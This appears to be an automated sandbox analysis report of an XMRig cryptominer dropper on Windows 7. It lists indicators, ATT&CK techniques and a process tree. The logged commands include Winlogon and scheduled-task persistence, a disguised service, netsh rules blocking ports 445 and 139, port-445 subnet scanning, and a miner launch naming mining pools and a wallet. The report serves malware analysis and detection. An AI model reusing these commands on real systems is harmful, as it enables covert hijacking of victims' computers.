xmrig | b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a

Analysis

max time kernel
151s
max time network
156s
platform
windows7_x64
resource
win7-20220414-en
submitted
19-05-2022 01:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aa.exe
Size

28.1MB
MD5

f9b2e96e5044fdaa7d923d516f6206e8
SHA1

936f9c88a574fede2fd37e54189e4b69c1215163
SHA256

b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
SHA512

c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

JOifcy.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\YVZLX\\JOifcy.exe"	JOifcy.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

XMRig Miner Payload 9 IoCs

miner

Processes:

resource	yara_rule
\Windows\YVZLX\JOifcy.exe	xmrig
\Windows\YVZLX\JOifcy.exe	xmrig
C:\Windows\YVZLX\JOifcy.exe	xmrig
C:\Windows\YVZLX\JOifcy.exe	xmrig
behavioral1/memory/1788-62-0x0000000000400000-0x0000000002054000-memory.dmp	xmrig
\Windows\YVZLX\dC.exe	xmrig
C:\Windows\YVZLX\dC.exe	xmrig
\Windows\YVZLX\dC.exe	xmrig
behavioral1/memory/1492-147-0x0000000000400000-0x0000000002054000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Executes dropped EXE 4 IoCs

Processes:

JOifcy.exedC.exesvchost.exesvchost.exe

pid process

1492 JOifcy.exe
1512 dC.exe
2076 svchost.exe
2160 svchost.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

624 cmd.exe
Loads dropped DLL 8 IoCs

Processes:

aa.exeJOifcy.execmd.execmd.exe

pid process

1788 aa.exe
1788 aa.exe
1492 JOifcy.exe
1720
1808 cmd.exe
1808 cmd.exe
2124 cmd.exe
2124 cmd.exe

pid	process
624	cmd.exe

pid	process
1788	aa.exe
1788	aa.exe
1492	JOifcy.exe
1720
1808	cmd.exe
1808	cmd.exe
2124	cmd.exe
2124	cmd.exe

Drops file in Windows directory 64 IoCs

Processes:

JOifcy.exeaa.exesvchost.exe

description	ioc	process
File created	C:\Windows\YVZLX\etch-0.dll	JOifcy.exe
File created	C:\Windows\YVZLX\riar.dll	JOifcy.exe
File created	C:\Windows\YVZLX\chrome..fb	JOifcy.exe
File created	C:\Windows\YVZLX\adfw.dll	JOifcy.exe
File created	C:\Windows\YVZLX\libxml2.dll	JOifcy.exe
File created	C:\Windows\YVZLX\posh-0.dll	JOifcy.exe
File created	C:\Windows\YVZLX\ucl.dll	JOifcy.exe
File created	C:\Windows\YVZLX\s.bat	JOifcy.exe
File created	C:\Windows\YVZLX\tscl.html	aa.exe
File created	C:\Windows\YVZLX\tibe-1.dll	JOifcy.exe
File created	C:\Windows\YVZLX\tibe-2.dll	JOifcy.exe
File opened for modification	C:\Windows\YVZLX\tscl.html	JOifcy.exe
File created	C:\Windows\YVZLX\ssleay32.dll	JOifcy.exe
File created	C:\Windows\YVZLX\eteb-2.dll	JOifcy.exe
File created	C:\Windows\YVZLX\pcla-0.dll	JOifcy.exe
File created	C:\Windows\YVZLX\WinRing0x64.sys	JOifcy.exe
File created	C:\Windows\YVZLX\Cstr.xml	JOifcy.exe
File created	C:\Windows\YVZLX\Cstr.exe	JOifcy.exe
File created	C:\Windows\YVZLX\adfw-2.dll	JOifcy.exe
File opened for modification	C:\Windows\YVZLX\svchost.exe	JOifcy.exe
File created	C:\Windows\boy.exe	aa.exe
File created	C:\Windows\YVZLX\libcurl.dll	JOifcy.exe
File created	C:\Windows\YVZLX\trfo.dll	JOifcy.exe
File created	C:\Windows\YVZLX\chrome..exe	JOifcy.exe
File created	C:\Windows\YVZLX\libiconv-2.dll	JOifcy.exe
File created	C:\Windows\YVZLX\trch-0.dll	JOifcy.exe
File created	C:\Windows\YVZLX\exma.dll	JOifcy.exe
File created	C:\Windows\YVZLX\dmgd-4.dll	JOifcy.exe
File created	C:\Windows\YVZLX\exma-1.dll	JOifcy.exe
File created	C:\Windows\YVZLX\pcreposix-0.dll	JOifcy.exe
File created	C:\Windows\YVZLX\svchost.exe	JOifcy.exe
File opened for modification	C:\Windows\YVZLX\s.bat	JOifcy.exe
File created	C:\Windows\YVZLX\coli-0.dll	JOifcy.exe
File created	C:\Windows\YVZLX\esco-0.dll	JOifcy.exe
File created	C:\Windows\YVZLX\tibe.dll	JOifcy.exe
File created	C:\Windows\YVZLX\trfo-0.dll	JOifcy.exe
File created	C:\Windows\IME\tps.exe	aa.exe
File created	C:\Windows\YVZLX\etchCore-0.x86.dll	JOifcy.exe
File created	C:\Windows\YVZLX\chrome..xml	JOifcy.exe
File created	C:\Windows\YVZLX\trch-1.dll	JOifcy.exe
File created	C:\Windows\YVZLX\dC.exe	JOifcy.exe
File created	C:\Windows\YVZLX\qdx.bat	JOifcy.exe
File created	C:\Windows\YVZLX\cnli-1.dll	JOifcy.exe
File created	C:\Windows\YVZLX\riar-2.dll	JOifcy.exe
File created	C:\Windows\YVZLX\zlib1.dll	JOifcy.exe
File created	C:\Windows\YVZLX\cnli-0.dll	JOifcy.exe
File created	C:\Windows\YVZLX\crli-0.dll	JOifcy.exe
File created	C:\Windows\YVZLX\etchCore-0.x64.dll	JOifcy.exe
File created	C:\Windows\YVZLX\etebCore-2.x86.dll	JOifcy.exe
File created	C:\Windows\YVZLX\iconv.dll	JOifcy.exe
File created	C:\Windows\YVZLX\libeay32.dll	JOifcy.exe
File created	C:\Windows\YVZLX\pcrecpp-0.dll	JOifcy.exe
File opened for modification	C:\Windows\YVZLX\Result.txt	svchost.exe
File created	C:\Windows\end.bat	JOifcy.exe
File created	C:\Windows\YVZLX\Cstr.fb	JOifcy.exe
File created	C:\Windows\YVZLX\dmgd-1.dll	JOifcy.exe
File created	C:\Windows\YVZLX\etebCore-2.x64.dll	JOifcy.exe
File created	C:\Windows\YVZLX\tucl-1.dll	JOifcy.exe
File created	C:\Windows\YVZLX\JOifcy.exe	aa.exe
File created	C:\Windows\YVZLX\posh.dll	JOifcy.exe
File created	C:\Windows\YVZLX\trfo-2.dll	JOifcy.exe
File created	C:\Windows\YVZLX\tucl.dll	JOifcy.exe
File created	C:\Windows\YVZLX\zibe.dll	JOifcy.exe
File created	C:\Windows\YVZLX\ip.dll	JOifcy.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

840 schtasks.exe

pid	process
840	schtasks.exe

Suspicious behavior: EnumeratesProcesses 51 IoCs

Processes:

JOifcy.exe

pid	process
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe
1492	JOifcy.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

468
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

dC.exe

description pid process

Token: SeLockMemoryPrivilege 1512 dC.exe
Token: SeLockMemoryPrivilege 1512 dC.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

aa.exeJOifcy.exe

pid process

1788 aa.exe
1788 aa.exe
1492 JOifcy.exe
1492 JOifcy.exe

pid	process
468

description	pid	process
Token: SeLockMemoryPrivilege	1512	dC.exe
Token: SeLockMemoryPrivilege	1512	dC.exe

pid	process
1788	aa.exe
1788	aa.exe
1492	JOifcy.exe
1492	JOifcy.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

aa.exeJOifcy.execmd.execmd.exe

description	pid	process	target process
PID 1788 wrote to memory of 1492	1788	aa.exe	JOifcy.exe
PID 1788 wrote to memory of 1492	1788	aa.exe	JOifcy.exe
PID 1788 wrote to memory of 1492	1788	aa.exe	JOifcy.exe
PID 1788 wrote to memory of 1492	1788	aa.exe	JOifcy.exe
PID 1788 wrote to memory of 624	1788	aa.exe	cmd.exe
PID 1788 wrote to memory of 624	1788	aa.exe	cmd.exe
PID 1788 wrote to memory of 624	1788	aa.exe	cmd.exe
PID 1788 wrote to memory of 624	1788	aa.exe	cmd.exe
PID 1492 wrote to memory of 1400	1492	JOifcy.exe	cmd.exe
PID 1492 wrote to memory of 1400	1492	JOifcy.exe	cmd.exe
PID 1492 wrote to memory of 1400	1492	JOifcy.exe	cmd.exe
PID 1492 wrote to memory of 1400	1492	JOifcy.exe	cmd.exe
PID 1400 wrote to memory of 764	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 764	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 764	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 764	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 776	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 776	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 776	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 776	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1780	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1780	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1780	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1780	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 544	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 544	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 544	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 544	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1248	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1248	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1248	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1248	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1288	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1288	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1288	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1288	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 856	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 856	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 856	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 856	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 240	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 240	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 240	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 240	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1608	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1608	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1608	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1608	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1728	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1728	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1728	1400	cmd.exe	netsh.exe
PID 1400 wrote to memory of 1728	1400	cmd.exe	netsh.exe
PID 1492 wrote to memory of 1004	1492	JOifcy.exe	cmd.exe
PID 1492 wrote to memory of 1004	1492	JOifcy.exe	cmd.exe
PID 1492 wrote to memory of 1004	1492	JOifcy.exe	cmd.exe
PID 1492 wrote to memory of 1004	1492	JOifcy.exe	cmd.exe
PID 1492 wrote to memory of 1332	1492	JOifcy.exe	cmd.exe
PID 1492 wrote to memory of 1332	1492	JOifcy.exe	cmd.exe
PID 1492 wrote to memory of 1332	1492	JOifcy.exe	cmd.exe
PID 1492 wrote to memory of 1332	1492	JOifcy.exe	cmd.exe
PID 1004 wrote to memory of 832	1004	cmd.exe	netsh.exe
PID 1004 wrote to memory of 832	1004	cmd.exe	netsh.exe
PID 1004 wrote to memory of 832	1004	cmd.exe	netsh.exe
PID 1004 wrote to memory of 832	1004	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\aa.exe
"C:\Users\Admin\AppData\Local\Temp\aa.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1788

C:\Windows\YVZLX\JOifcy.exe
C:\Windows\YVZLX\JOifcy.exe
2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:764

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:776

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:1780

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:544

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:1248

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:1288

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:856

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:240

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:1608

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:1728

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1004

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:832

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:1528

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:308

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:1732

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:880

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:1112

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:1152

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:1680

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:1624

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:696

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\end.bat" "
3⤵
PID:1332

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:764

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:1940

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:1248

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:1956

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:1376

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:1800

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:1536

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:1420

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:1868

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:1960

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\end.bat" "
3⤵
PID:1204

C:\Windows\SysWOW64\sc.exe
sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"
3⤵
PID:1944

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\YVZLX\qdx.bat" "
3⤵
PID:1532

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\YVZLX\JOifcy.exe" /SC ONSTART
4⤵
- Creates scheduled task(s)
PID:840

C:\Windows\YVZLX\dC.exe
"C:\Windows\YVZLX\dC.exe" -o stratum+tcp://wk.monerogx.com:6502 -o stratum+tcp://note.monerogx.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\YVZLX\s.bat" "
3⤵
- Loads dropped DLL
PID:1808

C:\Windows\YVZLX\svchost.exe
svchost.exe syn 10.127.0.0 10.127.255.255 445 /save
4⤵
- Executes dropped EXE
PID:2076

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\YVZLX\s.bat" "
3⤵
- Loads dropped DLL
PID:2124

C:\Windows\YVZLX\svchost.exe
svchost.exe tcp 10.127.0.0 10.127.255.255 445 450 /save
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2160

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"
2⤵
- Deletes itself
PID:624

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Winlogon Helper DLL

T1004

New Service

T1050

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\YVZLX\JOifcy.exe
Filesize
28.1MB

MD5
f9b2e96e5044fdaa7d923d516f6206e8

SHA1
936f9c88a574fede2fd37e54189e4b69c1215163

SHA256
b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a

SHA512
c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1

Download Submit
C:\Windows\YVZLX\JOifcy.exe
Filesize
28.1MB

MD5
f9b2e96e5044fdaa7d923d516f6206e8

SHA1
936f9c88a574fede2fd37e54189e4b69c1215163

SHA256
b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a

SHA512
c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1

Download Submit
C:\Windows\YVZLX\dC.exe
Filesize
6.8MB

MD5
90f9e1fdec81ccf508fc58f3d23156b5

SHA1
066783e092007d2bcd10e2bbf412269fb9260d3f

SHA256
d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018

SHA512
8463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95

Download Submit
C:\Windows\YVZLX\qdx.bat
Filesize
116B

MD5
9c34c98dff5bd8f258dadd08e5d45d89

SHA1
127dd3b015b860d4ed61011a382a4e32fbac9f82

SHA256
45c6862ce8304f27134577563eda26c320f08caa5797c33ae1765acbe464637f

SHA512
4650a0c32df7fe761804651c108b6058459fedc85aeba47bf222f780a2554e1dca62515528ff80ea6c208553726f1df97d343dcca90d6697cbf852b085e18d9f

Download Submit
C:\Windows\YVZLX\s.bat
Filesize
335B

MD5
b5f17481d6d186362e1b989d59f4485b

SHA1
286e596314689831c647c43a2d7258e7704062bb

SHA256
92d3d97610deea1906de9c1303e5928808d65c1bb6b0653613e13c0fa81a91f5

SHA512
5918ae4392e4b7b381426cd121478e12e2f7abbab3bbdeba5f383231aaff25436442f34a8735bc8efa3ab422650cccaf03fcaf22d627a0c10e5e1adbdacb9698

Download Submit
C:\Windows\YVZLX\s.bat
Filesize
338B

MD5
8e1fa5b53b2321b93a89316b11ed845b

SHA1
86254840496799d0ee5aafc225ceee6864d12b22

SHA256
e1e488051d8e7d68f52ff6e94b11c7ab24d23859effe38b0a274cdb9a5b912e8

SHA512
92ba0019615a0f5b7fa950683d6e00f02103e7ac964d4e58d8d0682d9a2bc4a0566c9f7cb7db1a24e7cbb9b056738d7ab65873cb545d03c6d8bd4ee542240653

Download Submit
C:\Windows\YVZLX\svchost.exe
Filesize
14KB

MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
C:\Windows\YVZLX\svchost.exe
Filesize
14KB

MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
C:\Windows\YVZLX\svchost.exe
Filesize
14KB

MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
C:\Windows\YVZLX\svchost.exe
Filesize
14KB

MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
C:\Windows\YVZLX\tscl.html
Filesize
6B

MD5
82ca5289b507fb42fd3c3f957b240626

SHA1
198b418473a770773cc5265c0f263655c4c4022f

SHA256
3eafb956900ebaf7bf7e18555e823bf227c51962d06ca5c05c9b2d889d69f62e

SHA512
d9cd1ad6bcffe6a155e471d2cea8e9ffac44a5ca5da9716871a4fdfda5c852182da5f1e5af3712abb0b382846db90c326faba91e95416ec9e283781560ebeb97

Download Submit
C:\Windows\end.bat
Filesize
1KB

MD5
c017d5f762ae5d67efb7d099b53cca58

SHA1
ab7f8553de7614251d76ce54aaee52f1a35e7ae6

SHA256
d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b

SHA512
856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78

Download Submit
C:\Windows\end.bat
Filesize
1KB

MD5
c017d5f762ae5d67efb7d099b53cca58

SHA1
ab7f8553de7614251d76ce54aaee52f1a35e7ae6

SHA256
d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b

SHA512
856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78

Download Submit
\Windows\YVZLX\JOifcy.exe
Filesize
28.1MB

MD5
f9b2e96e5044fdaa7d923d516f6206e8

SHA1
936f9c88a574fede2fd37e54189e4b69c1215163

SHA256
b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a

SHA512
c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1

Download Submit
\Windows\YVZLX\JOifcy.exe
Filesize
28.1MB

MD5
f9b2e96e5044fdaa7d923d516f6206e8

SHA1
936f9c88a574fede2fd37e54189e4b69c1215163

SHA256
b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a

SHA512
c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1

Download Submit
\Windows\YVZLX\dC.exe
Filesize
6.8MB

MD5
90f9e1fdec81ccf508fc58f3d23156b5

SHA1
066783e092007d2bcd10e2bbf412269fb9260d3f

SHA256
d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018

SHA512
8463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95

Download Submit
\Windows\YVZLX\dC.exe
Filesize
6.8MB

MD5
90f9e1fdec81ccf508fc58f3d23156b5

SHA1
066783e092007d2bcd10e2bbf412269fb9260d3f

SHA256
d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018

SHA512
8463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95

Download Submit
\Windows\YVZLX\svchost.exe
Filesize
14KB

MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
\Windows\YVZLX\svchost.exe
Filesize
14KB

MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
\Windows\YVZLX\svchost.exe
Filesize
14KB

MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
